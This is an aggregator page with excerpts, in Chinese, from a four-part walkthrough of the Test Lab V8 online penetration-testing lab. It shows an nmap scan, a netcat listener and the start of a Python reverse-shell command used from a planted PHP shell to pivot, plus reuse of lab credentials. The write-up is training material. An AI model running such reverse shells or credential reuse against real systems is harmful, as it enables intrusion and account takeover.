记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

TEST LAB V8在线渗透实验室教程(四)

在前三个部分,我们已经成功拿下了网络中的6个系统。这一部分我们将渗透SSH-Dev和Portal系统。攻击SSH-Dev正如上图所示,ssh-dev系统的IP是172.16.0.3,通过VPN网络无法ping通它。所以我们通过Cabinent系统ping下试试,在第一部分中我们已经攻破了Cabinet系统,上传了一个PHP shell。利用这个后门,我们ping SSH-Dev系统。通过Cabinet系统可以到达SSH-Dev系统,让我们建立一个Cabinet系统的反连shell,用它来攻击SSH-Dev,使用下面的命令执行netcat:nc-lvp 80我们使用Python的反连shell,回连监听的80端口:python -c “import sys,socket,os,pty; _,
发布时间:2016-04-25 15:55 | 阅读:120651 | 评论:0 | 标签:系统安全 网络安全 ssh Test Lab 内网渗透

TEST LAB V8在线渗透实验室教程(三)

这一部分我们将演示渗透Mail和SSH系统攻击MAIL当前,我们已经有了Westfall的账号和密码,可以登录它的邮箱,通过浏览其收件箱,我们找到了另外两个与sas-bank相关的邮箱账号。我们在使用Metasploit攻破terminal系统后,得到了一个用户名和密码列表。如果仔细查看所有的用户名,会发现有一个用户名与我们在Westfall的收件箱中找到的email地址有一些类似,比如leroydeschamp@sas-bank.lab,我们尝试用这个账户登录邮箱,密码使用其登录termimal系统的密码,成功登录了。打开收件箱,找到了一个邮件token。还有另外一个有趣的邮件,似乎是对攻击其它系统的提示,稍后我们再仔细研究。攻击SSH在第二部分中我们攻破了terminal系统,在Wes
发布时间:2016-04-23 16:25 | 阅读:91509 | 评论:0 | 标签:系统安全 网络安全 Mail ssh Test Lab 渗透教程

TEST LAB V8(二):Cisco设备和Terminal系统

这是test lab v8报告的第二部分,在第一部分中我们通过网关192.168.101.6攻破了两个系统网站和Cabinet。在这一部分,我们将看到如何通过网关192.168.101.7找到Cisco设备和Terminal系统的token。攻击CISCO:我们用nmap扫描网关,使用下面的命令:nmap -sS -sV -Pn -p1-65535 192.168.101.7Nmap找到了两个开放的端口,SSH和HTTP,我们使用浏览器访问IP和8100端口,加载了一个e-mail应用程序。我们在攻击Site和Cabinet系统时找到了一个有效的登录凭证,Ralph Westfall的账户。我们尝试使用该凭证(RalphWestfall@sas bank.lab / freeman)登录,
发布时间:2016-04-21 18:10 | 阅读:122582 | 评论:0 | 标签:系统安全 网络安全 Test Lab 内网渗透

TEST LAB V8在线渗透实验室教程(一)

Test Lab是一个与Offensive Security的实验室类似的在线渗透测试虚拟实验室。这个实验环境中包含12个系统,分别有各种各样的漏洞和配置错误。在每个系统上都有一个token,我们需要找到它并将其上传,用于验证攻破该系统。首先,你需要在这里注册,注册之后你可以在那儿获取你的VPN配置文件和口令。在开始之前,我们建议你使用Kali Linux,因为用到的所有工具那上面都有,实验室提供了一个网络拓扑图,这有助于你分析目标。正如在上面的网络拓扑图中看到的,有两个网关 192.168.101.6和192.168.101.7。通过第一个网关,只能访问3个系统,它们是site、cabinet和ssh-dev。通过第二个网关,可以访问其它剩下的机器。在这篇文章的第一部分,我们将攻下两个系
发布时间:2016-04-20 11:20 | 阅读:107764 | 评论:0 | 标签:WEB安全 系统安全 Test Lab

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词